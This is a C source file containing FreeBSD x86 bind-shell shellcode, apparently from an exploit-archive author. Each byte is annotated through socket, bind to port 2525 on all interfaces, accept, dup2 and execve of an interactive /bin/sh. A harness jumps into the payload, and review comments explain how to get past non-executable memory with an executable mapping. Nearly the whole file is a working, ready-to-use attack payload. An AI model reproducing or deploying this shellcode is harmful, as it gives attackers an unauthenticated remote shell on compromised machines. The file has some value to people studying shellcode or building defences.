/*
 * ==================================================
 *  bsd/x86 bind shell on port 2525 -- shellcode, 167 bytes
 * ==================================================
 *
 * AUTHOR : beosroot
 * OS     : BSD x86 (tested on FreeBSD)
 * EMAIL  : beosroot@hotmail.fr
 *          beosroot@null.net
 * GR33TZ : joseph-h, str0ke, MHIDO55, ...
 */
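/*
 * FreeBSD/x86 bind shell, 167 bytes (168 with the string literal's trailing NUL).
 *
 * Sequence: socket() -> bind(0.0.0.0:2525) -> listen() -> accept() ->
 * close(listener) -> dup2(client, 0/1/2) -> execve("/bin/sh", {"sh","-i",NULL}, NULL).
 *
 * BSD int $0x80 convention: syscall number in %eax, arguments on the stack in
 * C order (last argument pushed first), plus one dummy dword (the "push %eax"
 * right before each int $0x80) standing in for the return address a libc stub
 * would leave there. Nothing is ever popped after a syscall, so the saved
 * descriptors are re-read through growing %esp displacements (0x1c, 0x28,
 * 0x4c, 0x58, ...); each such line below is annotated with what it fetches.
 *
 * NOTE(review):
 *  - The encoding contains NUL bytes ("\x6a\x00", the zero-padded "sh"/"-i"
 *    pushes), so any str*-style copy truncates it; it is only usable from a
 *    harness that copies by length.
 *  - sin_addr is 0 (INADDR_ANY): it listens on every interface with no
 *    authentication, so whoever reaches TCP/2525 first gets the shell.
 *    Run it only on an isolated lab host.
 */
const char shellcode[] =
    /* socket(PF_INET, SOCK_STREAM, 0) -- SYS_socket = 97 */
    "\x6a\x00"              // push $0x0            protocol = 0
    "\x6a\x01"              // push $0x1            SOCK_STREAM
    "\x6a\x02"              // push $0x2            PF_INET
    "\x50"                  // push %eax            dummy return-address slot
    "\x6a\x61"              // push $0x61           SYS_socket
    "\x58"                  // pop  %eax
    "\xcd\x80"              // int  $0x80           %eax = listening fd
    "\x50"                  // push %eax            save listening fd
    /* bind(fd, &sockaddr_in, 16) -- SYS_bind = 104 */
    "\x6a\x00"              // push $0x0            sin_zero padding (one dword extra)
    "\x6a\x00"              // push $0x0            sin_zero
    "\x6a\x00"              // push $0x0            sin_zero
    "\x6a\x00"              // push $0x0            sin_addr = INADDR_ANY
    "\x68\x10\x02\x09\xdd"  // push $0xdd090210     sin_len=16, sin_family=2, sin_port=htons(2525)
    "\x89\xe0"              // mov  %esp,%eax       %eax = &sockaddr_in
    "\x6a\x10"              // push $0x10           addrlen = 16
    "\x50"                  // push %eax            &sockaddr_in
    "\xff\x74\x24\x1c"      // pushl 0x1c(%esp)     saved listening fd
    "\x50"                  // push %eax            dummy return-address slot
    "\x6a\x68"              // push $0x68           SYS_bind
    "\x58"                  // pop  %eax
    "\xcd\x80"              // int  $0x80
    /* listen(fd, 1) -- SYS_listen = 106 */
    "\x6a\x01"              // push $0x1            backlog = 1
    "\xff\x74\x24\x28"      // pushl 0x28(%esp)     saved listening fd
    "\x50"                  // push %eax            dummy return-address slot
    "\x6a\x6a"              // push $0x6a           SYS_listen
    "\x58"                  // pop  %eax
    "\xcd\x80"              // int  $0x80
    /* accept(fd, &addr, &addrlen) -- SYS_accept = 30 */
    "\x83\xec\x10"          // sub  $0x10,%esp      16-byte scratch sockaddr on the stack
    "\x6a\x10"              // push $0x10           addrlen = 16
    "\x8d\x44\x24\x04"      // lea  0x4(%esp),%eax  %eax = &scratch sockaddr
    "\x89\xe1"              // mov  %esp,%ecx       %ecx = &addrlen
    "\x51"                  // push %ecx            &addrlen
    "\x50"                  // push %eax            &addr
    "\xff\x74\x24\x4c"      // pushl 0x4c(%esp)     saved listening fd
    "\x50"                  // push %eax            dummy return-address slot
    "\x6a\x1e"              // push $0x1e           SYS_accept
    "\x58"                  // pop  %eax
    "\xcd\x80"              // int  $0x80           %eax = client fd
    "\x50"                  // push %eax            save client fd
    /* close(listening fd) -- SYS_close = 6 */
    "\xff\x74\x24\x58"      // pushl 0x58(%esp)     saved listening fd
    "\x50"                  // push %eax            dummy return-address slot
    "\x6a\x06"              // push $0x6            SYS_close
    "\x58"                  // pop  %eax
    "\xcd\x80"              // int  $0x80
    /* dup2(client, 0), dup2(client, 1), dup2(client, 2) -- SYS_dup2 = 90 */
    "\x6a\x00"              // push $0x0            stdin
    "\xff\x74\x24\x0c"      // pushl 0xc(%esp)      saved client fd
    "\x50"                  // push %eax            dummy return-address slot
    "\x6a\x5a"              // push $0x5a           SYS_dup2
    "\x58"                  // pop  %eax
    "\xcd\x80"              // int  $0x80
    "\x6a\x01"              // push $0x1            stdout
    "\xff\x74\x24\x18"      // pushl 0x18(%esp)     saved client fd
    "\x50"                  // push %eax            dummy return-address slot
    "\x6a\x5a"              // push $0x5a           SYS_dup2
    "\x58"                  // pop  %eax
    "\xcd\x80"              // int  $0x80
    "\x6a\x02"              // push $0x2            stderr
    "\xff\x74\x24\x24"      // pushl 0x24(%esp)     saved client fd
    "\x50"                  // push %eax            dummy return-address slot
    "\x6a\x5a"              // push $0x5a           SYS_dup2
    "\x58"                  // pop  %eax
    "\xcd\x80"              // int  $0x80
    /* execve("/bin/sh", {"sh", "-i", NULL}, NULL) -- SYS_execve = 59 */
    "\x68\x73\x68\x00\x00"  // push $0x00006873     "sh" + 2 NULs
    "\x89\xe0"              // mov  %esp,%eax       %eax = "sh"
    "\x68\x2d\x69\x00\x00"  // push $0x0000692d     "-i" + 2 NULs
    "\x89\xe1"              // mov  %esp,%ecx       %ecx = "-i"
    "\x6a\x00"              // push $0x0            argv[2] = NULL
    "\x51"                  // push %ecx            argv[1] = "-i"
    "\x50"                  // push %eax            argv[0] = "sh"
    "\x68\x2f\x73\x68\x00"  // push $0x0068732f     "/sh" + NUL
    "\x68\x2f\x62\x69\x6e"  // push $0x6e69622f     "/bin"  -> "/bin/sh" now at %esp
    "\x89\xe0"              // mov  %esp,%eax       %eax = "/bin/sh"
    "\x8d\x4c\x24\x08"      // lea  0x8(%esp),%ecx  %ecx = argv (just above the 8-byte path)
    "\x6a\x00"              // push $0x0            envp = NULL
    "\x51"                  // push %ecx            argv
    "\x50"                  // push %eax            path
    "\x50"                  // push %eax            dummy return-address slot
    "\x6a\x3b"              // push $0x3b           SYS_execve
    "\x58"                  // pop  %eax
    "\xcd\x80";             // int  $0x80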
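/*
 * Test harness: transfers control directly to the shellcode bytes.
 *
 * NOTE(review): `shellcode` is a const array and therefore lands in .rodata,
 * which is mapped without execute permission on any system enforcing W^X/NX.
 * There the indirect call below faults before the payload's first
 * instruction runs. To actually execute it, copy the bytes into a mapping
 * that is PROT_READ|PROT_WRITE|PROT_EXEC (mmap) before jumping -- confirm
 * against the target's memory-protection settings.
 *
 * Converting an object pointer to a function pointer is not defined by ISO
 * C; it is relied on here as the usual flat-address-space x86 behaviour,
 * exactly as the original did. The unused `void (*hell)()` alias was dropped.
 *
 * Returns whatever the payload returns, which on success is never: execve
 * replaces the process image.
 */
int main(void)
{
    int (*entry)(void) = (int (*)(void))shellcode;

    return entry();
}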
// the end o.O